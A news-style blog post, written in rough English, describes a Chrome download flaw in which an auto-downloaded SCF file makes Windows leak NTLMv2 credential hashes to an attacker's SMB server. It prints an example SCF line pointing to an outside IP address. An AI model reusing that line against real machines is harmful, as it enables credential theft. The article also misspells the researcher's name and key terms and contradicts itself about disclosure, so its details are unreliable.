Update! By Using Chrome, Hackers are Stealing Your Windows Password.
Hackers are stealing your windows password by using Google Chrome. This article is to aware you guys. Let’s check some latest updates related to this news..
According to Security Experts:- “There is a Google chrome vulnerability through which hackers are ready to steal people’s window login credentials login and to launch Server Message Block(SMB) to make attacks.”
A Defencecode engineer “Bosko Stankovic” firstly uncovered the Google Chrome vulnerability. He estimated in a blog that when he was running Google chrome on windows 10, he found the flow in a default configuration.
ALSO READ :- How to Resume Broken/Expired File Downloads in IDM
According to Bosko Stankovic- “The hackers just need the latest updated Google Chrome and Windows in order to surf his website to proceed and reuse victim’s authentication credentials.”
According to Defencecode:- They had not informed Google about the current vulnerability of Google Chrome. While Google said that ” Google is aware of this issue and they will take all necessary actions about this.”
Bosko Stankovic who is a serbian security researcher of DefenseCode estimated that – “Through this vulnerability hackers are targeting just not the Administration privileged users but also the organisations and regular users. The hackers can impersonate members of organisation and they can also reuse stolen credentials and to attack privileges to gain access to their IT controls. Those who are going to become victim of this, will receive a malicious link spontaneously and by clicking that link an automatic download will occur which consisting of SCF file or Windows Explorer Shell Command file. This SCF file will exfiltrate data which is linked to hacker’s server. This attack will provide victim’s username and password.”
Hackers Can Steal Your Windows Password Remotely Using Chrome
Boto Stankovic warned Google chrome users. According to him Organisations such as Microsoft Exchange will allow remote access to these services. Those who are using NTML as authentication method, are not safe from Sever Message Block relay attacks.
The Window Explorer Shell Command file is like a command which allows hackers to show desktop or open a window explorer window. This .scf file will trick the windows to authenticate the remote service message block servers. Look at this example, how the file looks like- [Shell] IconFile=\\188.8.131.52\
If a victim accidentally download this file than don’t open this file. If a victim click on download folder to view the file than you will gonna be the victim of the attacker.
The remaining attacking job is done by the Server meager block server which will capture the victim’s username and NTLMv2 password hash. This can also be cracked offline. So be aware!
Comment below guys and give us your opinions on this article and Google chrome vulnerability. Suggest some suggestions and feel free to ask if you have any questions. Have Fun!!!